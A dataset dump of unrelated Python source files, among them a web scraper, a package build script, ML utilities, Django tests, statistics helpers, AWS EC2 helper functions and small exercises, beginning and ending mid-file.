self.linkname += data\n\n def handle_endtag(self, tag):\n if tag == 'a' and self.href:\n self.linkname = ''.join(self.linkname.split())\n self.linkname = self.linkname.strip()\n self.data[-1].append(self.linkname)\n self.linkname = ''\n self.href = 0\n\n\nclass ParsePages(HTMLParser):\n def __init__(self):\n self.data = set([])\n self.href = 0\n self.patt = re.compile(r'^\\?p=\\d+$')\n HTMLParser.__init__(self)\n\n def handle_starttag(self, tag, attrs):\n if tag == 'a':\n for name, value in attrs:\n if name == 'href' and re.match(self.patt, value):\n self.href = 1\n self.data.add(value)\n\n def handle_endtag(self, tag):\n if tag == 'a' and self.href:\n self.href = 0\n\n\ndef fetch_data(pparser, url):\n headers = {\n 'User-Agent': '''Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)\n Chrome/28.0.1500.72 Safari/537.36'''\n }\n req = Request(\n url=url,\n headers=headers\n )\n pparser.feed(urlopen(req).read())\n pparser.close()\n return pparser.data\n\n\ndef main():\n result = []\n pattt = re.compile(r'程序员编码诀窍')\n urll = 'http://www.oschina.network/doc'\n pages = fetch_data(ParsePages(), urll)\n for eachurl in pages:\n print('**********')\n each_page_data = fetch_data(Parselinks(), urll + eachurl)\n for each_link_data in each_page_data:\n if re.match(pattt, each_link_data[1]):\n result.append(each_link_data)\n\n print(\"*\" * 30)\n for r in result:\n print('%s -> %s' % tuple(r))\n\n\nif __name__ == '__main__':\n main()","sub_path":"basic/mynetwork/html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"189374691","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2006-2008 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt\n\nfrom pisi.actionsapi import autotools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import perlmodules\nfrom pisi.actionsapi import get\n\nWorkDir=\"git-%s\" % get.srcVERSION().replace(\"_\",\".\")\n\ndef build():\n autotools.make('CFLAGS=\"%s\" \\\n LDFLAGS=\"%s\" \\\n DESTDIR=%s \\\n prefix=/usr \\\n GITWEB_CSS=\"gitweb/gitweb.css\" \\\n GITWEB_LOGO=\"gitweb/git-logo.png\" \\\n GITWEB_FAVICON=\"gitweb/git-favicon.png\" \\\n all' % (get.CFLAGS(), get.LDFLAGS(), get.installDIR()))\n\ndef install():\n autotools.rawInstall(\"DESTDIR=%s prefix=/usr\" % get.installDIR())\n\n # install-doc has compatibility issues with our docbook-xsl, use upstream's manpages\n # see manpages.patch in pspec.xml\n #autotools.make(\"DESTDIR=%s prefix=/usr mandir=/usr/share/man install-doc\" % get.installDIR())\n\n pisitools.insinto(\"/usr/share/man/man1/\", \"Documentation/man1/*.1\")\n pisitools.insinto(\"/usr/share/man/man5/\", \"Documentation/man5/*.5\")\n pisitools.insinto(\"/usr/share/man/man7/\", \"Documentation/man7/*.7\")\n\n # Emacs stuff\n pisitools.insinto(\"/usr/share/emacs/site-lisp\",\"contrib/emacs/*.el\")\n\n # gitweb\n pisitools.insinto(\"/var/www/localhost/cgi-perl\",\"gitweb/gitweb.cgi\",\"gitweb.pl\")\n pisitools.insinto(\"/var/www/localhost/cgi-perl/gitweb\",\"gitweb/*.css\")\n pisitools.insinto(\"/var/www/localhost/cgi-perl/gitweb\",\"gitweb/*.png\")\n\n perlmodules.fixLocalPod()\n\n pisitools.dodoc(\"README\", \"COPYING\", \"Documentation/SubmittingPatches\")\n","sub_path":"pardus/tags/2009/programming/vcs/git/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447383220","text":"#-*-coding:utf8 -*-\nfrom os import path\nfrom scrapy import signals\nfrom scrapy.xlib.pydispatch import dispatcher \nfrom scrapy.exceptions import DropItem\nclass myPipeline(object):\n import sys \n reload(sys) \n sys.setdefaultencoding('utf-8')\n\n count = 0\n filename = 'data/davos_crawl_data'\n def __init__(self):\n self.f = None \n self.f1 = None\n dispatcher.connect(self.open, signals.engine_started)\n dispatcher.connect(self.close, signals.engine_stopped)\n def process_item(self,item,spider):\n if(item['id'] != None and\n item['title'] != None and\n item['url'] != None and\n item['time'] != None and\n item['author'] != None and \n item['site'] != None and\n item['content'] != None):\n if not u\"2012年04月10日\" in item['time']:\n raise DropItem(\"time error\")\n self.count = self.count + 1\n id=self.count \n title=item['title']\n href=item['url']\n time=item['time']\n author=item['author']\n site=item['site']\n content=item['content']\n\n self.f = open(self.filename+'/'+str(self.count)+'.txt','w')\n self.f.write(str(title)+\"\\n \"+str(href)+ '\\n'+str(time)+'\\n'+str(author)+'\\n'+str(site)+'\\n'+str(content)+'\\n\\n\\n')\n self.f1.write(str(id)+\".\"+str(title)+\"\\n \"+str(href)+ '\\n'+str(time)+'\\n'+str(author)+'\\n'+str(site)+'\\n'+str(content)+'\\n\\n\\n')\n self.f.close() if self.f is not None else None\n return item \n def open(self): \n if path.exists( self.filename+'.txt'): \n self.f1 = open(self.filename+'.txt', 'a')\n else:\n self.f1 = open(self.filename+'.txt', 'w') \n def close(self):\n self.f1.close() if self.f1 is not None else None\n","sub_path":"scrapy/davos/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"46353844","text":"import torch as th\nfrom torch.autograd import Variable\nfrom collections import OrderedDict\nimport torch.nn as nn\nimport numpy as np\nfrom schnetpack2.data import Structure\n\nimport pdb\n\ndef make_input(device, batch_size = 10, N_atoms = 5):\n inputs = {}\n \n inputs[Structure.Z] = th.randint(1, 30, (batch_size, N_atoms)).long()\n inputs[Structure.R] = th.rand(batch_size, N_atoms, 3)\n inputs[Structure.cell] = th.eye(3).unsqueeze(0).expand(batch_size,3,3)\n inputs[Structure.cell_offset] = th.randint(-1, 2, (batch_size, N_atoms, N_atoms-1,3)).float()\n inputs[Structure.neighbors] = th.randint(0, N_atoms, (batch_size, N_atoms,N_atoms-1)).long()\n inputs[Structure.neighbor_mask] = th.zeros_like(inputs[Structure.neighbors]).float()\n inputs[Structure.atom_mask] = th.zeros_like(inputs[Structure.Z]).float()\n\n return {k:Variable(v.to(device)) for k,v in inputs.items()}\n\ndef summary(model, device):\n def register_hook(module):\n def hook(module, input, output):\n class_name = str(module.__class__).split('.')[-1].split(\"'\")[0]\n module_idx = len(summary)\n\n m_key = '%s-%i' % (class_name, module_idx+1)\n summary[m_key] = OrderedDict()\n \n if (isinstance(input, list) or isinstance(input, tuple)) and isinstance(input[0], th.Tensor):\n summary[m_key]['input_shape'] = list(input[0].size())\n summary[m_key]['input_shape'][0] = -1\n elif (isinstance(input, list) or isinstance(input, tuple)) and isinstance(input[0], dict):\n summary[m_key]['input_shape'] = list(input[0][Structure.neighbors].size())\n summary[m_key]['input_shape'][0] = -1\n elif isinstance(input, tuple) and isinstance(input[0], list) and isinstance(input[0][0], th.Tensor):#only for SC layer\n summary[m_key]['input_shape'] = list(input[0][0].size())\n summary[m_key]['input_shape'][0] = -1\n if not isinstance(output, dict):\n summary[m_key]['output_shape'] = list(output.size())\n summary[m_key]['output_shape'][0] = -1\n else:\n summary[m_key]['output_shape'] = list(output['y'].size())\n summary[m_key]['output_shape'][0] = -1\n \n params = 0\n if hasattr(module, 'weight'):\n params += th.prod(th.LongTensor(list(module.weight.size())))\n if module.weight.requires_grad:\n summary[m_key]['trainable'] = True\n else:\n summary[m_key]['trainable'] = False\n if hasattr(module, 'bias') and module.bias is not None:\n params += th.prod(th.LongTensor(list(module.bias.size())))\n if hasattr(module, 'offsets'):\n params += th.prod(th.LongTensor(list(module.offsets.size())))\n if module.offsets.requires_grad:\n summary[m_key]['trainable'] = True\n else:\n summary[m_key]['trainable'] = False \n if hasattr(module, 'width'):\n params += th.prod(th.LongTensor(list(module.width.size())))\n if module.width.requires_grad:\n summary[m_key]['trainable'] = True\n else:\n summary[m_key]['trainable'] = False \n summary[m_key]['nb_params'] = params\n \n if not isinstance(module, nn.Sequential) and \\\n not isinstance(module, nn.ModuleList) and \\\n not (module == model):\n hooks.append(module.register_forward_hook(hook))\n \n# dtype = th.cuda.FloatTensor\n \n x = make_input(device, batch_size = 10, N_atoms = 5)\n \n # create properties\n summary = OrderedDict()\n hooks = []\n # register hook\n model.apply(register_hook)\n # make a forward pass\n model(x)\n # remove these hooks\n for h in hooks:\n h.remove()\n\n print('----------------------------------------------------------------')\n line_new = '{:25} {:25} {:15}'.format('Layer (type)', 'Output Shape', 'Param #')\n print(line_new)\n print('================================================================')\n total_params = 0\n trainable_params = 0\n \n for layer in summary:\n ## input_shape, output_shape, trainable, nb_params\n trainable_params_print = 0\n if 'trainable' in summary[layer]:\n if summary[layer]['trainable'] == True:\n trainable_params += summary[layer]['nb_params']\n trainable_params_print = summary[layer]['nb_params']\n string_aux = str(summary[layer][\"output_shape\"])\n line_new = f'{layer:{25}} '\n line_new += f'{string_aux:{25}} '\n line_new += f'{trainable_params_print:{15}}'\n total_params += summary[layer]['nb_params']\n print(line_new)\n print('================================================================')\n print('Total params: ' + str(total_params))\n print('Trainable params: ' + str(trainable_params))\n print('Non-trainable params: ' + str(total_params - trainable_params))\n print('----------------------------------------------------------------')\n return summary","sub_path":"custom/utils/model_summary.py","file_name":"model_summary.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"529714356","text":"from pluto.apps.home import models, err_code\nfrom pluto.apps.project_case import models as project_case_models\nfrom pluto.apps.media import models as media_models\nfrom pluto.libs.test_utils import PlutoTestCase\n\n\nclass TopVideoTest(PlutoTestCase):\n def setUp(self):\n self.HOME_VIDEO_URL = '/home/api/v1/top_video'\n\n def _assert_top_video(self, video):\n resp = self._get(self.HOME_VIDEO_URL)\n\n self._test_success(resp)\n self.assertEqual(resp['data']['title'], video.title)\n\n @staticmethod\n def _create_top_video(title):\n video = media_models.Video.objects.create(title=title)\n\n top_video = models.TopVideo(video=video)\n top_video.save()\n\n return video, top_video\n\n def test_top_video_api(self):\n video1 = media_models.Video.objects.create(title='测试视频#1')\n models.TopVideo.objects.create(video=video1)\n\n self._assert_top_video(video1)\n\n def test_top_video_api_return_only_one_top_video(self):\n video1, top_video1 = self._create_top_video('测试视频#1')\n self._assert_top_video(video1)\n\n video2, top_video2 = self._create_top_video('测试视频#2')\n self._assert_top_video(video2)\n\n top_video1.available = True\n top_video1.save()\n self._assert_top_video(video1)\n\n def test_top_video_api_return_failure_resp_when_no_top_video(self):\n resp = self._get(self.HOME_VIDEO_URL)\n\n self._test_failure(resp, err_code.TOP_VIDEO_NOT_FOUND)\n self.assertEqual(resp['data'], None)\n\n\nclass SlideShowProjectCasesTest(PlutoTestCase):\n def setUp(self):\n self.SLIDESHOW_VIDEOS_URL = '/home/api/v1/slideshow/project_cases'\n\n def test_slideshow_project_case_api(self):\n media_models.Video.objects.create(title='测试视频#1')\n video2 = media_models.Video.objects.create(title='测试视频#2')\n media_models.Video.objects.create(title='测试视频#3')\n\n project_case1 = project_case_models.ProjectCase.objects.create(video=video2)\n project_case2 = project_case_models.ProjectCase.objects.create()\n\n models.SlideShowProjectCase.objects.create(priority=3)\n models.SlideShowProjectCase.objects.create(project_case=project_case1, priority=1)\n models.SlideShowProjectCase.objects.create(project_case=project_case2, priority=2)\n\n resp = self._get(self.SLIDESHOW_VIDEOS_URL)\n\n self._test_success(resp)\n self.assertEqual(resp['data'][0]['title'], project_case1.video.title)\n self.assertEqual(len(resp['data']), 1)\n\n\nclass SlideShowImagesTest(PlutoTestCase):\n def setUp(self):\n self.SLIDESHOW_IMAGES_URL = '/home/api/v1/slideshow/images'\n\n def test_slideshow_images_api(self):\n models.SlideShowImage.objects.create(img1='test/aaa.png')\n\n resp = self._get(self.SLIDESHOW_IMAGES_URL)\n\n self._test_success(resp)\n","sub_path":"pluto/apps/home/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455890725","text":"\"\"\"Age-Fitness selection\n\nThis module implements the Age-Fitness selection algorithm that defines\nthe selection used in the Age-Fitness evolutionary algorithm module.\nThis module expects to be used in conjunction with the\n``RandomIndividualVariation`` module that wraps the ``VarOr`` module.\n\"\"\"\nimport numpy as np\n\nfrom .Selection import Selection\nfrom ..Util.ArgumentValidation import argument_validation\n\n\nclass AgeFitness(Selection):\n \"\"\"Age-Fitness selection\n\n Parameters\n ----------\n selection_size : int\n The size of the group of individuals to be randomly\n compared. The size must be an integer greater than 1.\n \"\"\"\n WORST_CASE_FACTOR = 50\n\n @argument_validation(selection_size={\">=\": 2})\n def __init__(self, selection_size=2):\n self._selection_size = selection_size\n self._selected_indices = []\n self._population_index_array = np.array([])\n self._selection_attempts = 0\n\n @argument_validation(target_population_size={\">\": 0})\n def __call__(self, population, target_population_size):\n \"\"\"Performs Age-Fitness selection on a population. If ``selection_size``\n is larger than the population, the population size is used as the\n ``selection_size``.\n\n Parameters\n ----------\n population : list of Chromosome\n The population on which to perform selection\n target_population_size : int\n The size of the new population after selection. It will never be the\n case that the new population will have a size smaller than the\n target population. However, it *is* possible to for the new\n population to be larger than ``target_population_size``.\n\n Returns\n -------\n list of Chromosome :\n The chromosomes not selected for removal\n\n Raises\n ------\n ValueError\n If the ``target_population_size`` is larger than the intial\n `population`\n \"\"\"\n if target_population_size > len(population):\n raise ValueError(\"Target population size should\\\n be less than initial population\")\n\n num_removed = 0\n start_pop_size = len(population)\n self._population_index_array = np.random.permutation(len(population))\n\n self._selection_attempts = 0\n while (start_pop_size - num_removed) > target_population_size and \\\n self._selection_attempts < \\\n start_pop_size * self.WORST_CASE_FACTOR:\n\n self._get_unique_random_individuals(population,\n self._selection_size,\n num_removed)\n removed_indv_indexs = self._get_individuals_for_removal(\n population, target_population_size, num_removed)\n num_removed = self._remove_indviduals(removed_indv_indexs,\n num_removed)\n self._selection_attempts += 1\n\n return self._update_population(population, num_removed)\n\n def select_pareto_front(self, population):\n \"\"\"Selects the pareto front for the `population`\n\n Parameters\n ----------\n population: list of Chromosomes\n The population to which the pareto front individuals will be \n selected from.\n\n Returns\n -------\n list of Chromosomes:\n The Chromosomes in the pareto front.\n \"\"\"\n num_removed = 0\n self._population_index_array = np.random.permutation(len(population))\n\n self._get_unique_random_individuals(population,\n len(population),\n num_removed)\n removed_indv_indexs = self._get_individuals_for_removal(\n population, 1, num_removed)\n num_removed = self._remove_indviduals(removed_indv_indexs, num_removed)\n\n return self._update_population(population, num_removed)\n\n def _get_unique_random_individuals(self,\n population,\n selection_size,\n num_removed):\n index_range = range(num_removed, len(population))\n selection_size = min(selection_size, len(index_range))\n self._selected_indices = np.random.choice(index_range,\n selection_size,\n replace=False)\n\n # TODO look into optimizing. Possibly greedy approach\n def _get_individuals_for_removal(self, population,\n target_population_size, num_removed):\n to_be_removed = set()\n num_remaining = len(population) - num_removed\n for i, indv_index_1 in enumerate(self._selected_indices[:-1]):\n for indv_index_2 in self._selected_indices[i+1:]:\n self._update_removal_set(population, indv_index_1,\n indv_index_2, to_be_removed)\n if num_remaining - len(to_be_removed) == target_population_size:\n return to_be_removed\n return to_be_removed\n\n def _update_removal_set(self, population, indv_index_1,\n indv_index_2, removal_set):\n indv_1 = self._get_indvidual(population, indv_index_1)\n indv_2 = self._get_indvidual(population, indv_index_2)\n\n if self._first_dominates(indv_1, indv_2):\n removal_set.add(indv_index_2)\n elif self._first_dominates(indv_2, indv_1):\n removal_set.add(indv_index_1)\n\n def _get_indvidual(self, population, index):\n population_list_index = self._population_index_array[index]\n return population[population_list_index]\n\n @staticmethod\n def _first_dominates(indv_a, indv_b):\n return indv_a.genetic_age <= indv_b.genetic_age and \\\n indv_a.fitness <= indv_b.fitness\n\n def _remove_indviduals(self, to_remove_list, num_removed):\n while to_remove_list:\n selection_index = to_remove_list.pop()\n if num_removed in to_remove_list:\n to_remove_list.remove(num_removed)\n to_remove_list.add(selection_index)\n self._swap(self._population_index_array,\n num_removed, selection_index)\n num_removed += 1\n return num_removed\n\n @staticmethod\n def _swap(array, index_1, index_2):\n array[index_1], array[index_2] = array[index_2], array[index_1]\n\n def _update_population(self, population, num_removed):\n new_population = [self._get_indvidual(population, kept_index)\n for kept_index\n in range(num_removed, len(population))]\n return new_population\n","sub_path":"bingo/Base/AgeFitnessSelection.py","file_name":"AgeFitnessSelection.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"648160092","text":"# -*- coding: utf-8 -*-\n# pylint: disable=C0103,E1101\n\"\"\"\nMisc statistical functions.\n\"\"\"\n# Author: bertrand-l\n# License: BSD\n\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nimport numpy as np\ntry:\n import scipy.stats as spstats\nexcept ImportError:\n spstats = None\n\n\n__all__ = ('f_test', 'likelihood_ratio_test', 't_test_1samp', 'wald_test')\n\n\ndef confint(mean, scale, level=0.95, ndof=None):\n \"\"\"\n Confidence interval.\n\n Parameters\n ----------\n mean, scale : float or array_like\n mean and standard deviation of the parameters\n level : float 0 < < 1, optional\n confidence level\n ndof : int, optional\n number of degrees of freedom. If not specified, errors are assumed to\n be normally distributed. Otherwise, they are assumed to follow a\n t-distribution with `ndof` degrees of freedom.\n\n Returns\n -------\n confint : array\n \"\"\"\n mean, scale = np.asarray(mean), np.asarray(scale)\n if len(mean.shape) == 0:\n mean.shape = [1]\n if len(scale.shape) == 0:\n scale *= np.ones(len(mean))\n if spstats is not None:\n if ndof is not None:\n intervals = [spstats.t.interval(level, ndof, loc=loc, scale=sca)\n for loc, sca in zip(mean, scale)]\n else:\n intervals = [spstats.norm.interval(level, loc=loc, scale=sca)\n for loc, sca in zip(mean, scale)]\n intervals = np.array(intervals)\n else:\n intervals = np.array([(None, None)] * len(mean))\n if len(intervals) == 1:\n intervals = intervals[0]\n return intervals\n\n\ndef f_test(F, n_dof1, n_dof2):\n \"\"\"\n F-test.\n\n Parameters\n ----------\n F : float\n F-statistics\n n_dof1, n_dof2 : int\n number of degrees of freedom\n\n Returns\n -------\n pvalue : float\n probability to observe at least that F\n \"\"\"\n if spstats is not None:\n pvalue = 1 - spstats.f.cdf(F, n_dof1, n_dof2)\n else:\n pvalue = None\n return pvalue\n\n\ndef likelihood_ratio_test(logl, logl_null, n_dof):\n \"\"\"\n Likelihood ratio test.\n\n Parameters\n ----------\n logl : float\n log-likelihood of the alternative model\n logl_null : float\n log-likelihood of the null model\n n_dof : int\n difference in degrees of freedom between the alternative and null\n models.\n\n Returns\n -------\n chi2 : float\n Likelihood ratio chi^2\n pvalue : float\n Probability to observe at least chi2 under the null hypothesis\n \"\"\"\n chi2 = 2 * (logl - logl_null)\n if spstats is not None:\n # Prob(> chi2) under H0.\n pvalue = 1. - spstats.chi2.cdf(chi2, n_dof)\n else:\n pvalue = None\n return chi2, pvalue\n\n\ndef t_test_1samp(theta, theta0, scaling, n_dof):\n \"\"\"\n One sample t-test.\n\n Parameters\n ----------\n theta : array_like\n estimated parameters\n theta0 : array_like\n theoretical parameters\n scaling : float\n scaling parameter like standard error of the estimated parameters\n n_dof : int\n number of degrees of freedom\n\n Returns\n -------\n tscore : array\n standardized value of theta.\n pvalue : array\n probability to observe at least that t-score under H0 that theta=theta0\n \"\"\"\n theta, theta0 = np.asarray(theta), np.asarray(theta0)\n tscore = (theta - theta0) / scaling\n if spstats is not None:\n pvalue = np.array([1 - spstats.t.cdf(abs(t), n_dof) for t in tscore])\n else:\n pvalue = None\n return tscore, pvalue\n\n\ndef wald_test(theta, theta0, stddev):\n \"\"\"\n Wald test.\n\n Parameters\n ----------\n theta : array_like\n estimated parameters\n theta0 : array_like\n theoretical parameters\n stddev : float\n standard deviation/error of the estimated parameters\n\n Returns\n -------\n zscore : array\n standardized value of theta.\n pvalue : array\n probability to observe at least that t-score under H0 that theta=theta0\n \"\"\"\n theta, theta0 = np.asarray(theta), np.asarray(theta0)\n zscore = (theta - theta0) / stddev\n if spstats is not None:\n pvalue = np.array([1 - spstats.norm.cdf(abs(z)) for z in zscore])\n else:\n pvalue = None\n return zscore, pvalue\n","sub_path":"learnml/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"292016519","text":"class _Impl:\n '''\n gets a single character from standard input. does not echo to the screen.\n http://stackoverflow.com/questions/510357/python-read-a-single-character-from-the-user\n '''\n def __init__(self):\n try:\n self.impl = _Windows()\n except ImportError:\n self.impl = _Posix()\n def __call__(self):\n return self.impl()\n\nclass _Posix:\n def __init__(self):\n termios = __import__(r'termios')\n self.getattr, self.setattr, self.SADRAIN =\\\n termios.tcgetattr, termios.tcsetattr, termios.TCSADRAIN\n def __call__(self):\n from sys import stdin\n from tty import setraw as tty_set_raw\n stdin_fd = stdin.fileno()\n old_settings = self.getattr(stdin_fd)\n try:\n tty_set_raw(stdin_fd)\n ch = stdin.read(1)\n finally:\n self.setattr(stdin_fd, self.SADRAIN, old_settings)\n return ch\n\nclass _Windows:\n def __init__(self):\n self.getch = __import__(r'msvcrt').getch\n def __call__(self):\n return self.getch()\n\nkey_by_key = _Impl()\n","sub_path":"ken2015nov/keybykey.py","file_name":"keybykey.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320262780","text":"\ndef solution(rows, columns, queries):\n answer = []\n graph = [[0] * columns for _ in range(rows)]\n \n v = 1\n for i in range(rows):\n for j in range(columns):\n graph[i][j] = v\n v+=1\n \n for query in queries:\n x1, y1, x2, y2 = query[0]-1, query[1]-1, query[2]-1, query[3]-1\n\n rt = graph[x1][y2]\n min_value = rt\n\n #left to right\n for i in range(y2,y1,-1):\n graph[x1][i] = graph[x1][i-1]\n min_value = min(min_value, graph[x1][i])\n\n #bottom to top\n for i in range(x1,x2):\n graph[i][y1] = graph[i+1][y1]\n min_value = min(min_value, graph[i][y1])\n \n #right to left\n for i in range(y1,y2):\n graph[x2][i] = graph[x2][i+1]\n min_value = min(min_value, graph[x2][i])\n \n #bottom to top\n for i in range(x2,x1,-1):\n graph[i][y2] = graph[i-1][y2]\n min_value = min(min_value, graph[i][y2])\n \n graph[x1+1][y2] = rt\n answer.append(min_value)\n \n return answer\n\nrows = 6\ncolumns = 6\nqueries = [[2,2,5,4],[3,3,6,6],[5,1,6,3]]\nprint(solution(rows,columns,queries))\n\n\n","sub_path":"4.programmers/practice/Prog_연습문제_행렬 테두리 회전하기.py","file_name":"Prog_연습문제_행렬 테두리 회전하기.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"320526561","text":"'''给LList增加一个元素计数值域\r\n自定义函数__len__(),来求元素个数'''\r\n\r\n# 操作的错误类\r\nclass LinkedListUnderflow(ValueError):\r\n pass\r\n# 结点类\r\nclass LNode(object):\r\n\r\n def __init__(self, elem=0, next_=None):\r\n self.elem = elem\r\n self.next = next_\r\n\r\nclass LList(object):\r\n\r\n def __init__(self, lnode):\r\n # 初始化链表有一个头指针和计数结点\r\n self.num_node = lnode\r\n self._head = self.num_node\r\n\r\n # 求长度\r\n def __len__(self):\r\n p, n = self._head.next, 0\r\n while p is not None:\r\n n += 1\r\n p = p.next\r\n return n\r\n\r\n # 尾插法\r\n def append(self, elem):\r\n if self._head.next is None:\r\n self._head.next = LNode(elem)\r\n self.num_node.elem += 1\r\n return\r\n p = self.num_node\r\n while p.next is not None:\r\n p = p.next\r\n p.next = LNode(elem)\r\n self.num_node.elem += 1\r\n\r\n # 打印出表的所有元素\r\n def show_all(self):\r\n # p是循环指针\r\n p = self._head.next\r\n # 如果是空表\r\n if p is None:\r\n raise LinkedListUnderflow('该表是空表')\r\n while p is not None:\r\n print(p.elem, end='')\r\n if p.next is not None:\r\n print(',', end='')\r\n p = p.next\r\n print('')\r\n\r\nif __name__ == '__main__':\r\n\r\n lnode = LNode()\r\n llist = LList(lnode)\r\n for i in range(1, 11):\r\n llist.append(i)\r\n llist.show_all()\r\n print(llist.num_node.elem)\r\n print(len(llist))\r\n\r\n","sub_path":"数据结构Python/code/practice/线性表/P1.py","file_name":"P1.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"530323766","text":"import boto3\nimport json\nimport subprocess\nimport sys\nimport time\n\nscp = 'scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i default.pem'\nssh = 'ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -T -i default.pem'\n\n# Amazon Linux 2 AMI (HVM), SSD Volume Type\nimage_amzn_ami_x64 = 'ami-02e680c4540db351e'\n\ndef image_find(ec2, packageId):\n filters = [{'Name': 'tag:Name', 'Values': [packageId]}]\n images = ec2.describe_images(Filters=filters, Owners=['self'])['Images']\n if len(images) < 1:\n return None\n else:\n return images[0]['ImageId']\n\ndef instance_start(ec2, settings, security_group_id, userdata=''):\n instances = ec2.run_instances(\n ImageId=image_amzn_ami_x64,\n InstanceType=settings['instanceType'],\n KeyName=settings['keyPair'],\n SecurityGroupIds=[security_group_id],\n MinCount=1,\n MaxCount=1\n )['Instances']\n\n if len(instances) < 1:\n print('Could not start EC2 instance!')\n sys.exit(1)\n\n time.sleep(0.5)\n\n instance = boto3.resource('ec2').Instance(instances[0]['InstanceId'])\n return instance\n\ndef security_group_find(ec2, name):\n filters = [{'Name': 'tag:Name', 'Values': [name]}]\n groups = ec2.describe_security_groups(Filters=filters)['SecurityGroups']\n if len(groups) < 1:\n return None\n else:\n return groups[0]['GroupId']\n\ndef security_group_find_or_create(ec2, name, vpc_id, ports):\n group_id = security_group_find(ec2, name)\n\n if group_id == None:\n group_id = ec2.create_security_group(GroupName=name, Description=name, VpcId=vpc_id)['GroupId']\n group = boto3.resource('ec2').SecurityGroup(group_id)\n group.create_tags(Tags=[{'Key':'Name', 'Value': name}])\n security_group_ingress_authorize(group, ports)\n\n return group_id\n\ndef security_group_ingress_authorize(group, ports):\n for port in ports:\n group.authorize_ingress(\n CidrIp='0.0.0.0/0',\n FromPort=port,\n ToPort=port,\n IpProtocol='tcp'\n )\n\ndef subnet_find(ec2, name):\n filters = [{'Name': 'tag:Name', 'Values': [name]}]\n subnets = ec2.describe_subnets(Filters=filters)['Subnets']\n if len(subnets) < 1:\n return None\n else:\n return subnets[0]['SubnetId']\n\n\ndef settings_read():\n with open('settings.json') as json_data:\n data = json.load(json_data,) \n return data\n\ndef sys_call(cmd):\n return subprocess.call([cmd], shell=True)\n\ndef sys_process(cmd, stdin):\n p = subprocess.Popen([cmd], shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n (out, _) = p.communicate(stdin.encode())\n return out.decode()\n\ndef vpc_default(ec2):\n vpcs = ec2.describe_vpcs(Filters=[{'Name': 'isDefault', 'Values': ['true']}])['Vpcs']\n if len(vpcs) < 1:\n print(\"Default VPC not found!\")\n sys.exit(1)\n return vpcs[0]['VpcId']\n\ndef vpc_find(ec2, name):\n filters = [{'Name': 'tag:Name', 'Values': [name]}]\n vpcs = ec2.describe_vpcs(Filters=filters)['Vpcs']\n if len(vpcs) < 1:\n print(\"Default VPC not found!\")\n sys.exit(1)\n return vpcs[0]['VpcId']\n\n# Internals\ndef call_scp(public_ip, local, target, flags=\"\"):\n sys_call(scp + ' %s %s ec2-user@%s:%s'%(flags, local, public_ip, target))\n\ndef call_ssh(public_ip, script):\n result = sys_process(ssh + ' ec2-user@%s'%(public_ip), script)\n print(result)\n return result\n","sub_path":"lib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"105700635","text":"# For each dataset listed in dataset_pids.txt, get terms of use and access metadata\n\nimport csv\nimport json\nimport glob\nimport os\nfrom tkinter import filedialog\nfrom tkinter import ttk\nfrom tkinter import *\n\n# Create GUI for getting user input\n\n# Create, title and size the window\nwindow = Tk()\nwindow.title('Get terms of use and access metadata')\nwindow.geometry('550x250') # width x height\n\n\n# Function called when Browse button is pressed\ndef retrieve_jsondirectory():\n\tglobal jsonDirectory\n\n\t# Call the OS's file directory window and store selected object path as a global variable\n\tjsonDirectory = filedialog.askdirectory()\n\n\t# Show user which directory she chose\n\tlabel_showChosenDirectory = Label(window, text='You chose: ' + jsonDirectory, anchor='w', foreground='green')\n\tlabel_showChosenDirectory.grid(sticky='w', column=0, row=2)\n\n\n# Function called when Browse button is pressed\ndef retrieve_csvdirectory():\n\tglobal csvDirectory\n\n\t# Call the OS's file directory window and store selected object path as a global variable\n\tcsvDirectory = filedialog.askdirectory()\n\n\t# Show user which directory she chose\n\tlabel_showChosenDirectory = Label(window, text='You chose: ' + csvDirectory, anchor='w', foreground='green')\n\tlabel_showChosenDirectory.grid(sticky='w', column=0, row=6)\n\n\n# Function called when Browse button is pressed\ndef start():\n\twindow.destroy()\n\n\n# Create label for button to browse for directory containing JSON files\nlabel_getJSONFiles = Label(window, text='Choose folder containing the JSON files:', anchor='w')\nlabel_getJSONFiles.grid(sticky='w', column=0, row=0, pady=2)\n\n# Create button to browse for directory containing JSON files\nbutton_getJSONFiles = 